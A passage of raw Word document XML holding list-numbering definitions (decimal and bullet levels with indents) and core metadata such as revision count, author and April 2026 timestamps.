      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="E63AEE02">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="4BAA5110">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="3CBED616">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="AE744A44">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="AB9C12F2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="28C68242">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="84C858E6">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4FE97577"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="72FA67DA"/>
    <w:lvl w:ilvl="0" w:tplc="B74437CE">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="3468C5D2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="8FCC17FA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="17D23292">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="73D8BB88">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="C9369C80">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="72CC86E8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="0BEA74CC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="264EC83A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6CEC72BA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CF3E2858"/>
    <w:lvl w:ilvl="0" w:tplc="413C009E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="F264AE10">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="2F1831F2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="9C7EFDF2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="BE70469E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="675E0E46">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="ED88F8B4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="A5A42022">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="1D5A64A8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="682317684">
    <w:abstractNumId w:val="2"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1844781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6E5"/>
    <w:rsid w:val="00094E9B"/>
    <w:rsid w:val="000B2753"/>
    <w:rsid w:val="005166E5"/>
    <w:rsid w:val="008B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8346"/>
  <w15:docId w15:val="{ED0BF1BD-6FA4-4C79-BE4F-125891E5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926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Neelesh Pandey</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-06T13:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-06T13:17:00Z</dcterms:modified>
</cp:coreProperties>
</file>